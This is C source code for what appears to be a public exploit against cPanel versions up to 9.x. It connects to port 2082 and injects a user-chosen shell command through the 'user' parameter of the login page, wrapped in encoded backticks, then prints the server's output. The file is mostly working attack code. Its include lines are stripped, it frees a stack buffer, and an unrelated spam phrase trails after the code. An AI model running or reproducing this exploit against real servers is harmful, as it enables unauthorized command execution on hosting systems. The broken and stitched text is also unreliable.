/* cPanel <= 9x Remote Command Execution Coded by Lympex - lympex[at]gmail[dot]com && http://l-bytes.net */ //headers #include //In/Out #include //sockets functions #include //memory functions #include //strlen,strcat,strcpy #pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib" #define Port 2082 //port for connect to cPanel #define SIZE 1024 //buffer size to receive the data /*connect host:port*/ SOCKET Conecta(char *Host, short puerto) { /*struct for make the socket*/ WSADATA wsaData; SOCKET Winsock;//listener socket /*two structures for connect*/ struct sockaddr_in Winsock_In; struct hostent *Ip; /*start the socket*/ WSAStartup(MAKEWORD(2,2), &wsaData); /*make*/ Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); //check socket status if(Winsock==INVALID_SOCKET) { /*exit*/ WSACleanup(); return -1; } /*complete the struct*/ Ip=gethostbyname(Host); Winsock_In.sin_port=htons(puerto); Winsock_In.sin_family=AF_INET; Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr))); /*connect*/ if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { /*end*/ WSACleanup(); return -1; } return Winsock; } /*MASTER FUNCTION*/ int main(int argc, char *argv[]) { /*the socket*/ SOCKET sock; /*make the evil buffer to send the request*/ char evil_request[]="GET /login/?user=|%22%60"; char evil_request2[]="%60%22\r"; char *evil; /*to receive the data*/ char buf[SIZE]; printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex"); printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net"); printf("\n-----------------------------------------------------\n"); if(argc!=3)//cPanel_9x_rce.exe { printf("\n[+] Usage: %s \n",argv[0]); return 0; } printf("\n[+] Connecting %s:%d...",argv[1],Port); /*start the exploit*/ sock=Conecta(argv[1],Port);//connect if(sock==-1) { printf("Error\n"); return 1; } printf("OK"); /*make the EVIL request*/ evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char)); strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n"); //sends it send(sock,evil,strlen(evil),0); buf[recv(sock,buf,SIZE,0)]='\0'; //show the data printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf); WSACleanup(); LocalFree(buf); LocalFree(evil); return 0; }

亚洲欧美在线